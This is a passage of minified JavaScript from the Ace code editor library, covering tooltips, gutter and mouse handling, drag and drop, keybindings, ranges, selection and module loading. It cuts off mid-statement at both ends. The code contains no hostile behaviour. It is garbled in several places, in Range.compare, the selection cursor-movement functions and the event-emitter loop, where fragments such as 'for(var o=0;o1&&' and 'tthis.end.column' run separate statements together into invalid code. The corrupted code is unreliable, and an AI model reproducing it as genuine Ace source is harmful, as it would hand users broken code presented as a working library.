this.$element||this.$init()},this.setText=function(e){i.setInnerText(this.getElement(),e)},this.setHtml=function(e){this.getElement().innerHTML=e},this.setPosition=function(e,t){this.getElement().style.left=e+"px",this.getElement().style.top=t+"px"},this.setClassName=function(e){i.addCssClass(this.getElement(),e)},this.show=function(e,t,n){e!=null&&this.setText(e),t!=null&&n!=null&&this.setPosition(t,n),this.isOpen||(this.getElement().style.display="block",this.isOpen=!0)},this.hide=function(){this.isOpen&&(this.getElement().style.display="none",this.isOpen=!1)},this.getHeight=function(){return this.getElement().offsetHeight},this.getWidth=function(){return this.getElement().offsetWidth}}).call(s.prototype),t.Tooltip=s}),ace.define("ace/mouse/default_gutter_handler",["require","exports","module","ace/lib/dom","ace/lib/oop","ace/lib/event","ace/tooltip"],function(e,t,n){"use strict";function u(e){function l(){var r=u.getDocumentPosition().row,s=n.$annotations[r];if(!s)return c();var o=t.session.getLength();if(r==o){var a=t.renderer.pixelToScreenCoordinates(0,u.y).row,l=u.$pos;if(a>t.session.documentToScreenRow(l.row,l.column))return c()}if(f==s)return;f=s.text.join("
      "),i.setHtml(f),i.show(),t._signal("showGutterTooltip",i),t.on("mousewheel",c);if(e.$tooltipFollowsMouse)h(u);else{var p=u.domEvent.target,d=p.getBoundingClientRect(),v=i.getElement().style;v.left=d.right+"px",v.top=d.bottom+"px"}}function c(){o&&(o=clearTimeout(o)),f&&(i.hide(),f=null,t._signal("hideGutterTooltip",i),t.removeEventListener("mousewheel",c))}function h(e){i.setPosition(e.x,e.y)}var t=e.editor,n=t.renderer.$gutterLayer,i=new a(t.container);e.editor.setDefaultHandler("guttermousedown",function(r){if(!t.isFocused()||r.getButton()!=0)return;var i=n.getRegion(r);if(i=="foldWidgets")return;var s=r.getDocumentPosition().row,o=t.session.selection;if(r.getShiftKey())o.selectTo(s,0);else{if(r.domEvent.detail==2)return t.selectAll(),r.preventDefault();e.$clickSelection=t.selection.getLineRange(s)}return e.setState("selectByLines"),e.captureMouse(r),r.preventDefault()});var o,u,f;e.editor.setDefaultHandler("guttermousemove",function(t){var n=t.domEvent.target||t.domEvent.srcElement;if(r.hasCssClass(n,"ace_fold-widget"))return c();f&&e.$tooltipFollowsMouse&&h(t),u=t;if(o)return;o=setTimeout(function(){o=null,u&&!e.isMousePressed?l():c()},50)}),s.addListener(t.renderer.$gutter,"mouseout",function(e){u=null;if(!f||o)return;o=setTimeout(function(){o=null,c()},50)}),t.on("changeSession",c)}function a(e){o.call(this,e)}var r=e("../lib/dom"),i=e("../lib/oop"),s=e("../lib/event"),o=e("../tooltip").Tooltip;i.inherits(a,o),function(){this.setPosition=function(e,t){var n=window.innerWidth||document.documentElement.clientWidth,r=window.innerHeight||document.documentElement.clientHeight,i=this.getWidth(),s=this.getHeight();e+=15,t+=15,e+i>n&&(e-=e+i-n),t+s>r&&(t-=20+s),o.prototype.setPosition.call(this,e,t)}}.call(a.prototype),t.GutterHandler=u}),ace.define("ace/mouse/mouse_event",["require","exports","module","ace/lib/event","ace/lib/useragent"],function(e,t,n){"use strict";var r=e("../lib/event"),i=e("../lib/useragent"),s=t.MouseEvent=function(e,t){this.domEvent=e,this.editor=t,this.x=this.clientX=e.clientX,this.y=this.clientY=e.clientY,this.$pos=null,this.$inSelection=null,this.propagationStopped=!1,this.defaultPrevented=!1};(function(){this.stopPropagation=function(){r.stopPropagation(this.domEvent),this.propagationStopped=!0},this.preventDefault=function(){r.preventDefault(this.domEvent),this.defaultPrevented=!0},this.stop=function(){this.stopPropagation(),this.preventDefault()},this.getDocumentPosition=function(){return this.$pos?this.$pos:(this.$pos=this.editor.renderer.screenToTextCoordinates(this.clientX,this.clientY),this.$pos)},this.inSelection=function(){if(this.$inSelection!==null)return this.$inSelection;var e=this.editor,t=e.getSelectionRange();if(t.isEmpty())this.$inSelection=!1;else{var n=this.getDocumentPosition();this.$inSelection=t.contains(n.row,n.column)}return this.$inSelection},this.getButton=function(){return r.getButton(this.domEvent)},this.getShiftKey=function(){return this.domEvent.shiftKey},this.getAccelKey=i.isMac?function(){return this.domEvent.metaKey}:function(){return this.domEvent.ctrlKey}}).call(s.prototype)}),ace.define("ace/mouse/dragdrop_handler",["require","exports","module","ace/lib/dom","ace/lib/event","ace/lib/useragent"],function(e,t,n){"use strict";function f(e){function T(e,n){var r=Date.now(),i=!n||e.row!=n.row,s=!n||e.column!=n.column;if(!S||i||s)t.$blockScrolling+=1,t.moveCursorToPosition(e),t.$blockScrolling-=1,S=r,x={x:p,y:d};else{var o=l(x.x,x.y,p,d);o>a?S=null:r-S>=u&&(t.renderer.scrollCursorIntoView(),S=null)}}function N(e,n){var r=Date.now(),i=t.renderer.layerConfig.lineHeight,s=t.renderer.layerConfig.characterWidth,u=t.renderer.scroller.getBoundingClientRect(),a={x:{left:p-u.left,right:u.right-p},y:{top:d-u.top,bottom:u.bottom-d}},f=Math.min(a.x.left,a.x.right),l=Math.min(a.y.top,a.y.bottom),c={row:e.row,column:e.column};f/s<=2&&(c.column+=a.x.left=o&&t.renderer.scrollCursorIntoView(c):E=r:E=null}function C(){var e=g;g=t.renderer.screenToTextCoordinates(p,d),T(g,e),N(g,e)}function k(){m=t.selection.toOrientedRange(),h=t.session.addMarker(m,"ace_selection",t.getSelectionStyle()),t.clearSelection(),t.isFocused()&&t.renderer.$cursorLayer.setBlinking(!1),clearInterval(v),C(),v=setInterval(C,20),y=0,i.addListener(document,"mousemove",O)}function L(){clearInterval(v),t.session.removeMarker(h),h=null,t.$blockScrolling+=1,t.selection.fromOrientedRange(m),t.$blockScrolling-=1,t.isFocused()&&!w&&t.renderer.$cursorLayer.setBlinking(!t.getReadOnly()),m=null,g=null,y=0,E=null,S=null,i.removeListener(document,"mousemove",O)}function O(){A==null&&(A=setTimeout(function(){A!=null&&h&&L()},20))}function M(e){var t=e.types;return!t||Array.prototype.some.call(t,function(e){return e=="text/plain"||e=="Text"})}function _(e){var t=["copy","copymove","all","uninitialized"],n=["move","copymove","linkmove","all","uninitialized"],r=s.isMac?e.altKey:e.ctrlKey,i="uninitialized";try{i=e.dataTransfer.effectAllowed.toLowerCase()}catch(e){}var o="none";return r&&t.indexOf(i)>=0?o="copy":n.indexOf(i)>=0?o="move":t.indexOf(i)>=0&&(o="copy"),o}var t=e.editor,n=r.createElement("img");n.src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",s.isOpera&&(n.style.cssText="width:1px;height:1px;position:fixed;top:0;left:0;z-index:2147483647;opacity:0;");var f=["dragWait","dragWaitEnd","startDrag","dragReadyEnd","onMouseDrag"];f.forEach(function(t){e[t]=this[t]},this),t.addEventListener("mousedown",this.onMouseDown.bind(e));var c=t.container,h,p,d,v,m,g,y=0,b,w,E,S,x;this.onDragStart=function(e){if(this.cancelDrag||!c.draggable){var r=this;return setTimeout(function(){r.startSelect(),r.captureMouse(e)},0),e.preventDefault()}m=t.getSelectionRange();var i=e.dataTransfer;i.effectAllowed=t.getReadOnly()?"copy":"copyMove",s.isOpera&&(t.container.appendChild(n),n.scrollTop=0),i.setDragImage&&i.setDragImage(n,0,0),s.isOpera&&t.container.removeChild(n),i.clearData(),i.setData("Text",t.session.getTextRange()),w=!0,this.setState("drag")},this.onDragEnd=function(e){c.draggable=!1,w=!1,this.setState(null);if(!t.getReadOnly()){var n=e.dataTransfer.dropEffect;!b&&n=="move"&&t.session.remove(t.getSelectionRange()),t.renderer.$cursorLayer.setBlinking(!0)}this.editor.unsetStyle("ace_dragging"),this.editor.renderer.setCursorStyle("")},this.onDragEnter=function(e){if(t.getReadOnly()||!M(e.dataTransfer))return;return p=e.clientX,d=e.clientY,h||k(),y++,e.dataTransfer.dropEffect=b=_(e),i.preventDefault(e)},this.onDragOver=function(e){if(t.getReadOnly()||!M(e.dataTransfer))return;return p=e.clientX,d=e.clientY,h||(k(),y++),A!==null&&(A=null),e.dataTransfer.dropEffect=b=_(e),i.preventDefault(e)},this.onDragLeave=function(e){y--;if(y<=0&&h)return L(),b=null,i.preventDefault(e)},this.onDrop=function(e){if(!g)return;var n=e.dataTransfer;if(w)switch(b){case"move":m.contains(g.row,g.column)?m={start:g,end:g}:m=t.moveText(m,g);break;case"copy":m=t.moveText(m,g,!0)}else{var r=n.getData("Text");m={start:g,end:t.session.insert(g,r)},t.focus(),b=null}return L(),i.preventDefault(e)},i.addListener(c,"dragstart",this.onDragStart.bind(e)),i.addListener(c,"dragend",this.onDragEnd.bind(e)),i.addListener(c,"dragenter",this.onDragEnter.bind(e)),i.addListener(c,"dragover",this.onDragOver.bind(e)),i.addListener(c,"dragleave",this.onDragLeave.bind(e)),i.addListener(c,"drop",this.onDrop.bind(e));var A=null}function l(e,t,n,r){return Math.sqrt(Math.pow(n-e,2)+Math.pow(r-t,2))}var r=e("../lib/dom"),i=e("../lib/event"),s=e("../lib/useragent"),o=200,u=200,a=5;(function(){this.dragWait=function(){var e=Date.now()-this.mousedownEvent.time;e>this.editor.getDragDelay()&&this.startDrag()},this.dragWaitEnd=function(){var e=this.editor.container;e.draggable=!1,this.startSelect(this.mousedownEvent.getDocumentPosition()),this.selectEnd()},this.dragReadyEnd=function(e){this.editor.renderer.$cursorLayer.setBlinking(!this.editor.getReadOnly()),this.editor.unsetStyle("ace_dragging"),this.editor.renderer.setCursorStyle(""),this.dragWaitEnd()},this.startDrag=function(){this.cancelDrag=!1;var e=this.editor,t=e.container;t.draggable=!0,e.renderer.$cursorLayer.setBlinking(!1),e.setStyle("ace_dragging");var n=s.isWin?"default":"move";e.renderer.setCursorStyle(n),this.setState("dragReady")},this.onMouseDrag=function(e){var t=this.editor.container;if(s.isIE&&this.state=="dragReady"){var n=l(this.mousedownEvent.x,this.mousedownEvent.y,this.x,this.y);n>3&&t.dragDrop()}if(this.state==="dragWait"){var n=l(this.mousedownEvent.x,this.mousedownEvent.y,this.x,this.y);n>0&&(t.draggable=!1,this.startSelect(this.mousedownEvent.getDocumentPosition()))}},this.onMouseDown=function(e){if(!this.$dragEnabled)return;this.mousedownEvent=e;var t=this.editor,n=e.inSelection(),r=e.getButton(),i=e.domEvent.detail||1;if(i===1&&r===0&&n){if(e.editor.inMultiSelectMode&&(e.getAccelKey()||e.getShiftKey()))return;this.mousedownEvent.time=Date.now();var o=e.domEvent.target||e.domEvent.srcElement;"unselectable"in o&&(o.unselectable="on");if(t.getDragDelay()){if(s.isWebKit){this.cancelDrag=!0;var u=t.container;u.draggable=!0}this.setState("dragWait")}else this.startDrag();this.captureMouse(e,this.onMouseDrag.bind(this)),e.defaultPrevented=!0}}}).call(f.prototype),t.DragdropHandler=f}),ace.define("ace/lib/net",["require","exports","module","ace/lib/dom"],function(e,t,n){"use strict";var r=e("./dom");t.get=function(e,t){var n=new XMLHttpRequest;n.open("GET",e,!0),n.onreadystatechange=function(){n.readyState===4&&t(n.responseText)},n.send(null)},t.loadScript=function(e,t){var n=r.getDocumentHead(),i=document.createElement("script");i.src=e,n.appendChild(i),i.onload=i.onreadystatechange=function(e,n){if(n||!i.readyState||i.readyState=="loaded"||i.readyState=="complete")i=i.onload=i.onreadystatechange=null,n||t()}},t.qualifyURL=function(e){var t=document.createElement("a");return t.href=e,t.href}}),ace.define("ace/lib/event_emitter",["require","exports","module"],function(e,t,n){"use strict";var r={},i=function(){this.propagationStopped=!0},s=function(){this.defaultPrevented=!0};r._emit=r._dispatchEvent=function(e,t){this._eventRegistry||(this._eventRegistry={}),this._defaultHandlers||(this._defaultHandlers={});var n=this._eventRegistry[e]||[],r=this._defaultHandlers[e];if(!n.length&&!r)return;if(typeof t!="object"||!t)t={};t.type||(t.type=e),t.stopPropagation||(t.stopPropagation=i),t.preventDefault||(t.preventDefault=s),n=n.slice();for(var o=0;o1&&(i=n[n.length-2]);var o=a[t+"Path"];return o==null?o=a.basePath:r=="/"&&(t=r=""),o&&o.slice(-1)!="/"&&(o+="/"),o+t+r+i+this.get("suffix")},t.setModuleUrl=function(e,t){return a.$moduleUrls[e]=t},t.$loading={},t.loadModule=function(n,r){var i,o;Array.isArray(n)&&(o=n[0],n=n[1]);try{i=e(n)}catch(u){}if(i&&!t.$loading[n])return r&&r(i);t.$loading[n]||(t.$loading[n]=[]),t.$loading[n].push(r);if(t.$loading[n].length>1)return;var a=function(){e([n],function(e){t._emit("load.module",{name:n,module:e});var r=t.$loading[n];t.$loading[n]=null,r.forEach(function(t){t&&t(e)})})};if(!t.get("packaged"))return a();s.loadScript(t.moduleUrl(n,o),a)},t.init=f}),ace.define("ace/mouse/mouse_handler",["require","exports","module","ace/lib/event","ace/lib/useragent","ace/mouse/default_handlers","ace/mouse/default_gutter_handler","ace/mouse/mouse_event","ace/mouse/dragdrop_handler","ace/config"],function(e,t,n){"use strict";var r=e("../lib/event"),i=e("../lib/useragent"),s=e("./default_handlers").DefaultHandlers,o=e("./default_gutter_handler").GutterHandler,u=e("./mouse_event").MouseEvent,a=e("./dragdrop_handler").DragdropHandler,f=e("../config"),l=function(e){var t=this;this.editor=e,new s(this),new o(this),new a(this);var n=function(t){var n=!document.hasFocus||!document.hasFocus()||!e.isFocused()&&document.activeElement==(e.textInput&&e.textInput.getElement());n&&window.focus(),e.focus()},u=e.renderer.getMouseEventTarget();r.addListener(u,"click",this.onMouseEvent.bind(this,"click")),r.addListener(u,"mousemove",this.onMouseMove.bind(this,"mousemove")),r.addMultiMouseDownListener([u,e.renderer.scrollBarV&&e.renderer.scrollBarV.inner,e.renderer.scrollBarH&&e.renderer.scrollBarH.inner,e.textInput&&e.textInput.getElement()].filter(Boolean),[400,300,250],this,"onMouseEvent"),r.addMouseWheelListener(e.container,this.onMouseWheel.bind(this,"mousewheel")),r.addTouchMoveListener(e.container,this.onTouchMove.bind(this,"touchmove"));var f=e.renderer.$gutter;r.addListener(f,"mousedown",this.onMouseEvent.bind(this,"guttermousedown")),r.addListener(f,"click",this.onMouseEvent.bind(this,"gutterclick")),r.addListener(f,"dblclick",this.onMouseEvent.bind(this,"gutterdblclick")),r.addListener(f,"mousemove",this.onMouseEvent.bind(this,"guttermousemove")),r.addListener(u,"mousedown",n),r.addListener(f,"mousedown",n),i.isIE&&e.renderer.scrollBarV&&(r.addListener(e.renderer.scrollBarV.element,"mousedown",n),r.addListener(e.renderer.scrollBarH.element,"mousedown",n)),e.on("mousemove",function(n){if(t.state||t.$dragDelay||!t.$dragEnabled)return;var r=e.renderer.screenToTextCoordinates(n.x,n.y),i=e.session.selection.getRange(),s=e.renderer;!i.isEmpty()&&i.insideStart(r.row,r.column)?s.setCursorStyle("default"):s.setCursorStyle("")})};(function(){this.onMouseEvent=function(e,t){this.editor._emit(e,new u(t,this.editor))},this.onMouseMove=function(e,t){var n=this.editor._eventRegistry&&this.editor._eventRegistry.mousemove;if(!n||!n.length)return;this.editor._emit(e,new u(t,this.editor))},this.onMouseWheel=function(e,t){var n=new u(t,this.editor);n.speed=this.$scrollSpeed*2,n.wheelX=t.wheelX,n.wheelY=t.wheelY,this.editor._emit(e,n)},this.onTouchMove=function(e,t){var n=new u(t,this.editor);n.speed=1,n.wheelX=t.wheelX,n.wheelY=t.wheelY,this.editor._emit(e,n)},this.setState=function(e){this.state=e},this.captureMouse=function(e,t){this.x=e.x,this.y=e.y,this.isMousePressed=!0;var n=this.editor.renderer;n.$keepTextAreaAtCursor&&(n.$keepTextAreaAtCursor=null);var s=this,o=function(e){if(!e)return;if(i.isWebKit&&!e.which&&s.releaseMouse)return s.releaseMouse();s.x=e.clientX,s.y=e.clientY,t&&t(e),s.mouseEvent=new u(e,s.editor),s.$mouseMoved=!0},a=function(e){clearInterval(l),f(),s[s.state+"End"]&&s[s.state+"End"](e),s.state="",n.$keepTextAreaAtCursor==null&&(n.$keepTextAreaAtCursor=!0,n.$moveTextAreaToCursor()),s.isMousePressed=!1,s.$onCaptureMouseMove=s.releaseMouse=null,e&&s.onMouseEvent("mouseup",e)},f=function(){s[s.state]&&s[s.state](),s.$mouseMoved=!1};if(i.isOldIE&&e.domEvent.type=="dblclick")return setTimeout(function(){a(e)});s.$onCaptureMouseMove=o,s.releaseMouse=r.capture(this.editor.container,o,a);var l=setInterval(f,20)},this.releaseMouse=null,this.cancelContextMenu=function(){var e=function(t){if(t&&t.domEvent&&t.domEvent.type!="contextmenu")return;this.editor.off("nativecontextmenu",e),t&&t.domEvent&&r.stopEvent(t.domEvent)}.bind(this);setTimeout(e,10),this.editor.on("nativecontextmenu",e)}}).call(l.prototype),f.defineOptions(l.prototype,"mouseHandler",{scrollSpeed:{initialValue:2},dragDelay:{initialValue:i.isMac?150:0},dragEnabled:{initialValue:!0},focusTimout:{initialValue:0},tooltipFollowsMouse:{initialValue:!0}}),t.MouseHandler=l}),ace.define("ace/mouse/fold_handler",["require","exports","module"],function(e,t,n){"use strict";function r(e){e.on("click",function(t){var n=t.getDocumentPosition(),r=e.session,i=r.getFoldAt(n.row,n.column,1);i&&(t.getAccelKey()?r.removeFold(i):r.expandFold(i),t.stop())}),e.on("gutterclick",function(t){var n=e.renderer.$gutterLayer.getRegion(t);if(n=="foldWidgets"){var r=t.getDocumentPosition().row,i=e.session;i.foldWidgets&&i.foldWidgets[r]&&e.session.onFoldWidgetClick(r,t),e.isFocused()||e.focus(),t.stop()}}),e.on("gutterdblclick",function(t){var n=e.renderer.$gutterLayer.getRegion(t);if(n=="foldWidgets"){var r=t.getDocumentPosition().row,i=e.session,s=i.getParentFoldRangeData(r,!0),o=s.range||s.firstRange;if(o){r=o.start.row;var u=i.getFoldAt(r,i.getLine(r).length,1);u?i.removeFold(u):(i.addFold("...",o),e.renderer.scrollCursorIntoView({row:o.start.row,column:0}))}t.stop()}})}t.FoldHandler=r}),ace.define("ace/keyboard/keybinding",["require","exports","module","ace/lib/keys","ace/lib/event"],function(e,t,n){"use strict";var r=e("../lib/keys"),i=e("../lib/event"),s=function(e){this.$editor=e,this.$data={editor:e},this.$handlers=[],this.setDefaultHandler(e.commands)};(function(){this.setDefaultHandler=function(e){this.removeKeyboardHandler(this.$defaultHandler),this.$defaultHandler=e,this.addKeyboardHandler(e,0)},this.setKeyboardHandler=function(e){var t=this.$handlers;if(t[t.length-1]==e)return;while(t[t.length-1]&&t[t.length-1]!=this.$defaultHandler)this.removeKeyboardHandler(t[t.length-1]);this.addKeyboardHandler(e,1)},this.addKeyboardHandler=function(e,t){if(!e)return;typeof e=="function"&&!e.handleKeyboard&&(e.handleKeyboard=e);var n=this.$handlers.indexOf(e);n!=-1&&this.$handlers.splice(n,1),t==undefined?this.$handlers.push(e):this.$handlers.splice(t,0,e),n==-1&&e.attach&&e.attach(this.$editor)},this.removeKeyboardHandler=function(e){var t=this.$handlers.indexOf(e);return t==-1?!1:(this.$handlers.splice(t,1),e.detach&&e.detach(this.$editor),!0)},this.getKeyboardHandler=function(){return this.$handlers[this.$handlers.length-1]},this.getStatusText=function(){var e=this.$data,t=e.editor;return this.$handlers.map(function(n){return n.getStatusText&&n.getStatusText(t,e)||""}).filter(Boolean).join(" ")},this.$callKeyboardHandlers=function(e,t,n,r){var s,o=!1,u=this.$editor.commands;for(var a=this.$handlers.length;a--;){s=this.$handlers[a].handleKeyboard(this.$data,e,t,n,r);if(!s||!s.command)continue;s.command=="null"?o=!0:o=u.exec(s.command,this.$editor,s.args,r),o&&r&&e!=-1&&s.passEvent!=1&&s.command.passEvent!=1&&i.stopEvent(r);if(o)break}return!o&&e==-1&&(s={command:"insertstring"},o=u.exec("insertstring",this.$editor,t)),o&&this.$editor._signal&&this.$editor._signal("keyboardActivity",s),o},this.onCommandKey=function(e,t,n){var i=r.keyCodeToString(n);this.$callKeyboardHandlers(t,i,n,e)},this.onTextInput=function(e){this.$callKeyboardHandlers(-1,e)}}).call(s.prototype),t.KeyBinding=s}),ace.define("ace/range",["require","exports","module"],function(e,t,n){"use strict";var r=function(e,t){return e.row-t.row||e.column-t.column},i=function(e,t,n,r){this.start={row:e,column:t},this.end={row:n,column:r}};(function(){this.isEqual=function(e){return this.start.row===e.start.row&&this.end.row===e.end.row&&this.start.column===e.start.column&&this.end.column===e.end.column},this.toString=function(){return"Range: ["+this.start.row+"/"+this.start.column+"] -> ["+this.end.row+"/"+this.end.column+"]"},this.contains=function(e,t){return this.compare(e,t)==0},this.compareRange=function(e){var t,n=e.end,r=e.start;return t=this.compare(n.row,n.column),t==1?(t=this.compare(r.row,r.column),t==1?2:t==0?1:0):t==-1?-2:(t=this.compare(r.row,r.column),t==-1?-1:t==1?42:0)},this.comparePoint=function(e){return this.compare(e.row,e.column)},this.containsRange=function(e){return this.comparePoint(e.start)==0&&this.comparePoint(e.end)==0},this.intersects=function(e){var t=this.compareRange(e);return t==-1||t==0||t==1},this.isEnd=function(e,t){return this.end.row==e&&this.end.column==t},this.isStart=function(e,t){return this.start.row==e&&this.start.column==t},this.setStart=function(e,t){typeof e=="object"?(this.start.column=e.column,this.start.row=e.row):(this.start.row=e,this.start.column=t)},this.setEnd=function(e,t){typeof e=="object"?(this.end.column=e.column,this.end.row=e.row):(this.end.row=e,this.end.column=t)},this.inside=function(e,t){return this.compare(e,t)==0?this.isEnd(e,t)||this.isStart(e,t)?!1:!0:!1},this.insideStart=function(e,t){return this.compare(e,t)==0?this.isEnd(e,t)?!1:!0:!1},this.insideEnd=function(e,t){return this.compare(e,t)==0?this.isStart(e,t)?!1:!0:!1},this.compare=function(e,t){return!this.isMultiLine()&&e===this.start.row?tthis.end.column?1:0:ethis.end.row?1:this.start.row===e?t>=this.start.column?0:-1:this.end.row===e?t<=this.end.column?0:1:0},this.compareStart=function(e,t){return this.start.row==e&&this.start.column==t?-1:this.compare(e,t)},this.compareEnd=function(e,t){return this.end.row==e&&this.end.column==t?1:this.compare(e,t)},this.compareInside=function(e,t){return this.end.row==e&&this.end.column==t?1:this.start.row==e&&this.start.column==t?-1:this.compare(e,t)},this.clipRows=function(e,t){if(this.end.row>t)var n={row:t+1,column:0};else if(this.end.rowt)var r={row:t+1,column:0};else if(this.start.rowt.row||e.row==t.row&&e.column>t.column},this.getRange=function(){var e=this.anchor,t=this.lead;return this.isEmpty()?o.fromPoints(t,t):this.isBackwards()?o.fromPoints(t,e):o.fromPoints(e,t)},this.clearSelection=function(){this.$isEmpty||(this.$isEmpty=!0,this._emit("changeSelection"))},this.selectAll=function(){var e=this.doc.getLength()-1;this.setSelectionAnchor(0,0),this.moveCursorTo(e,this.doc.getLine(e).length)},this.setRange=this.setSelectionRange=function(e,t){t?(this.setSelectionAnchor(e.end.row,e.end.column),this.selectTo(e.start.row,e.start.column)):(this.setSelectionAnchor(e.start.row,e.start.column),this.selectTo(e.end.row,e.end.column)),this.getRange().isEmpty()&&(this.$isEmpty=!0),this.$desiredColumn=null},this.$moveSelection=function(e){var t=this.lead;this.$isEmpty&&this.setSelectionAnchor(t.row,t.column),e.call(this)},this.selectTo=function(e,t){this.$moveSelection(function(){this.moveCursorTo(e,t)})},this.selectToPosition=function(e){this.$moveSelection(function(){this.moveCursorToPosition(e)})},this.moveTo=function(e,t){this.clearSelection(),this.moveCursorTo(e,t)},this.moveToPosition=function(e){this.clearSelection(),this.moveCursorToPosition(e)},this.selectUp=function(){this.$moveSelection(this.moveCursorUp)},this.selectDown=function(){this.$moveSelection(this.moveCursorDown)},this.selectRight=function(){this.$moveSelection(this.moveCursorRight)},this.selectLeft=function(){this.$moveSelection(this.moveCursorLeft)},this.selectLineStart=function(){this.$moveSelection(this.moveCursorLineStart)},this.selectLineEnd=function(){this.$moveSelection(this.moveCursorLineEnd)},this.selectFileEnd=function(){this.$moveSelection(this.moveCursorFileEnd)},this.selectFileStart=function(){this.$moveSelection(this.moveCursorFileStart)},this.selectWordRight=function(){this.$moveSelection(this.moveCursorWordRight)},this.selectWordLeft=function(){this.$moveSelection(this.moveCursorWordLeft)},this.getWordRange=function(e,t){if(typeof t=="undefined"){var n=e||this.lead;e=n.row,t=n.column}return this.session.getWordRange(e,t)},this.selectWord=function(){this.setSelectionRange(this.getWordRange())},this.selectAWord=function(){var e=this.getCursor(),t=this.session.getAWordRange(e.row,e.column);this.setSelectionRange(t)},this.getLineRange=function(e,t){var n=typeof e=="number"?e:this.lead.row,r,i=this.session.getFoldLine(n);return i?(n=i.start.row,r=i.end.row):r=n,t===!0?new o(n,0,r,this.session.getLine(r).length):new o(n,0,r+1,0)},this.selectLine=function(){this.setSelectionRange(this.getLineRange())},this.moveCursorUp=function(){this.moveCursorBy(-1,0)},this.moveCursorDown=function(){this.moveCursorBy(1,0)},this.moveCursorLeft=function(){var e=this.lead.getPosition(),t;if(t=this.session.getFoldAt(e.row,e.column,-1))this.moveCursorTo(t.start.row,t.start.column);else if(e.column===0)e.row>0&&this.moveCursorTo(e.row-1,this.doc.getLine(e.row-1).length);else{var n=this.session.getTabSize();this.session.isTabStop(e)&&this.doc.getLine(e.row).slice(e.column-n,e.column).split(" ").length-1==n?this.moveCursorBy(0,-n):this.moveCursorBy(0,-1)}},this.moveCursorRight=function(){var e=this.lead.getPosition(),t;if(t=this.session.getFoldAt(e.row,e.column,1))this.moveCursorTo(t.end.row,t.end.column);else if(this.lead.column==this.doc.getLine(this.lead.row).length)this.lead.row0&&(t.column=r)}}this.moveCursorTo(t.row,t.column)},this.moveCursorFileEnd=function(){var e=this.doc.getLength()-1,t=this.doc.getLine(e).length;this.moveCursorTo(e,t)},this.moveCursorFileStart=function(){this.moveCursorTo(0,0)},this.moveCursorLongWordRight=function(){var e=this.lead.row,t=this.lead.column,n=this.doc.getLine(e),r=n.substring(t),i;this.session.nonTokenRe.lastIndex=0,this.session.tokenRe.lastIndex=0;var s=this.session.getFoldAt(e,t,1);if(s){this.moveCursorTo(s.end.row,s.end.column);return}if(i=this.session.nonTokenRe.exec(r))t+=this.session.nonTokenRe.lastIndex,this.session.nonTokenRe.lastIndex=0,r=n.substring(t);if(t>=n.length){this.moveCursorTo(e,n.length),this.moveCursorRight(),e0&&this.moveCursorWordLeft();return}if(o=this.session.tokenRe.exec(s))t-=this.session.tokenRe.lastIndex,this.session.tokenRe.lastIndex=0;this.moveCursorTo(e,t)},this.$shortWordEndIndex=function(e){var t,n=0,r,i=/\s/,s=this.session.tokenRe;s.lastIndex=0;if(t=this.session.tokenRe.exec(e))n=this.session.tokenRe.lastIndex;else{while((r=e[n])&&i.test(r))n++;if(n<1){s.lastIndex=0;while((r=e[n])&&!s.test(r)){s.lastIndex=0,n++;if(i.test(r)){if(n>2){n--;break}while((r=e[n])&&i.test(r))n++;if(n>2)break}}}}return s.lastIndex=0,n},this.moveCursorShortWordRight=function(){var e=this.lead.row,t=this.lead.column,n=this.doc.getLine(e),r=n.substring(t),i=this.session.getFoldAt(e,t,1);if(i)return this.moveCursorTo(i.end.row,i.end.column);if(t==n.length){var s=this.doc.getLength();do e++,r=this.doc.getLine(e);while(e0&&/^\s*$/.test(r));t=r.length,/\s+$/.test(r)||(r="")}var s=i.stringReverse(r),o=this.$shortWordEndIndex(s);return this.moveCursorTo(e,t-o)},this.moveCursorWordRight=function(){this.session.$selectLongWords?this.moveCursorLongWordRight():this.moveCursorShortWordRight()},this.moveCursorWordLeft=function(){this.session.$selectLongWords?this.moveCursorLongWordLeft():this.moveCursorShortWordLeft()},this.moveCursorBy=function(e,t){var n=this.session.documentToScreenPosition(this.lead.row,this.lead.column);t===0&&(this.$desiredColumn?n.column=this.$desiredColumn:this.$desiredColumn=n.column);var r=this.session.screenToDocumentPosition(n.row+e,n.column);e!==0&&t===0&&r.row===this.lead.row&&r.column===this.lead.column&&this.session.lineWidgets&&this.session.lineWidgets[r.row]&&(r.row>0||e>0)&&r.row++,this.moveCursorTo(r.row,r.column+t,t===0)},this.moveCursorToPosition=function(e){this.moveCursorTo(e.row,e.column)},this.moveCursorTo=function(e,t,n){var r=this.session.getFoldAt(e,t,1);r&&(e=r.start.row,t=r.start.column),this.$keepDesiredColumnOnChange=!0,this.lead.setPosition(e,t),this.$keepDesiredColumnOnChange=!1,n||(this.$desiredColumn=null)},this.moveCursorToScreen=function(e,t,n){var r=this.session.screenToDocumentPosition(e,t);this.moveCursorTo(r.row,r.column,n)},this.detach=function(){this.lead.detach(),this.anchor.detach(),this.session=this.doc=null},this.fromOrientedRange=function(e){this.setSelectionRange(e,e.cursor==e.start),this.$desiredColumn=e.desiredColumn||this.$desiredColumn},this.toOrientedRange=function(e){var t=this.getRange();return e?(e.start.column=t.start.column,e.start.row=t.start.row,e.end.column=t.end.column,e.end.row=t.end.row):e=t,e.cursor=this.isBackwards()?e.start:e.end,e.desiredColumn=this.$desiredColumn,e},this.getRangeOfMovements=function(e){var t=this.getCursor();try{e(this);var n=this.getCursor();return o.fromPoints(t,n)}catch(r){return o.fromPoints(t,t)}finally{this.moveCursorToPosition(t)}},this.toJSON=function(){if(this.rangeCount)var e=this.ranges.map(function(e){var t=e.clone();return t.isBackwards=e.cursor==e.start,t});else{var e=this.getRange();e.isBackwards=this.isBackwards()}return e},this.fromJSON=function(e){if(e.start==undefined){if(this.rangeList){this.toSingleRange(e[0]);for(var t=e.length;t--;){var n=o.fromPoints(e[t].start,e[t].end);e[t].isBackwards&&(n.cursor=n.start),this.addRange(n,!0)}return}e=e[0]}this.rangeList&&this.toSingleRange(e),this.setSelectionRange(e,e.isBackwards)},this.isEqual=function(e){if((e.length||this.rangeCount)&&e.length!=this.rangeCount)return!1;if(!e.length||!this.ranges)return this.getRange().isEqual(e);for(var t=this.ranges.length;t--;)if(!this.ranges[t].isEqual(e[t]))return!1;return!0}}).call(u.prototype),t.Selection=u}),ace.define("ace/tokenizer",["require","exports","module","ace/config"],function(e,t,n){"use strict";var r=e("./config"),i=2e3,s=function(e){this.states=e,this.regExps={},this.matchMappings={};for(var t in this.states){var 